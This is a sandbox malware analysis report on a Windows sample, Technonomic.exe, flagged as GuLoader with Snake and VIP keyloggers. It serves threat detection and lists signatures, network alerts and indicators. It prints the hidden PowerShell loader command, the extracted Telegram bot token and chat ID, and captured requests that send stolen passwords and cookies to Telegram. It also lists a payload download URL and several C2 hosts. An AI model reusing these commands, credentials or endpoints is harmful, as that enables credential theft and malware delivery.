Edit tour

Windows Analysis Report
Technonomic.exe

Overview

General Information

Sample name:	Technonomic.exe
Analysis ID:	1580360
MD5:	c174a412be6f74c3323ae8d6d4737086
SHA1:	c703daa5df8c281206a8d85b582b8a1b729748f5
SHA256:	bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
Tags:	exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Technonomic.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\Technonomic.exe" MD5: C174A412BE6F74C3323AE8D6D4737086)

powershell.exe (PID: 7576 cmdline: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7192 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2620412422.00000000258F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.2598654434.000000000651E000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7192	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DesusertionIp: 172.217.19.238, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7192, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49859

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7576, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) ", CommandLine: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Technonomic.exe", ParentImage: C:\Users\user\Desktop\Technonomic.exe, ParentProcessId: 7472, ParentProcessName: Technonomic.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) ", ProcessId: 7576, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:28:31.203039+0100	2803305	3	Unknown Traffic	192.168.2.9	49893	172.67.177.134	443	TCP
2024-12-24T11:28:43.419540+0100	2803305	3	Unknown Traffic	192.168.2.9	49930	172.67.177.134	443	TCP
2024-12-24T11:28:46.508208+0100	2803305	3	Unknown Traffic	192.168.2.9	49938	172.67.177.134	443	TCP
2024-12-24T11:28:49.552413+0100	2803305	3	Unknown Traffic	192.168.2.9	49947	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:28:27.076023+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49881	193.122.6.168	80	TCP
2024-12-24T11:28:29.591650+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49881	193.122.6.168	80	TCP
2024-12-24T11:28:32.638538+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49898	193.122.6.168	80	TCP
2024-12-24T11:28:35.701053+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49907	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:28:19.193344+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49859	172.217.19.238	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:29:01.923440+0100	1810008	1	Potentially Bad Traffic	192.168.2.9	49980	149.154.167.220	443	TCP
2024-12-24T11:29:05.422716+0100	1810008	1	Potentially Bad Traffic	192.168.2.9	49990	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:28:54.646489+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49962	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}
Source: msiexec.exe.7192.7.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: Technonomic.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Technonomic.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49887 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.9:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49962 version: TLS 1.2

Source: Technonomic.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 032AF45Dh	7_2_032AF130
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 032AF45Dh	7_2_032AF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 032AFC19h	7_2_032AF961

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49962 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49980 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49990 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2558e4eafe83Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2581d8da2c05Host: api.telegram.orgContent-Length: 1277Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49907 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49898 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49881 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49859 -> 172.217.19.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49938 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49893 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49930 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49947 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49887 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2558e4eafe83Host: api.telegram.orgContent-Length: 580

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 24 Dec 2024 10:28:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Technonomic.exe, Technonomic.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20a
Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
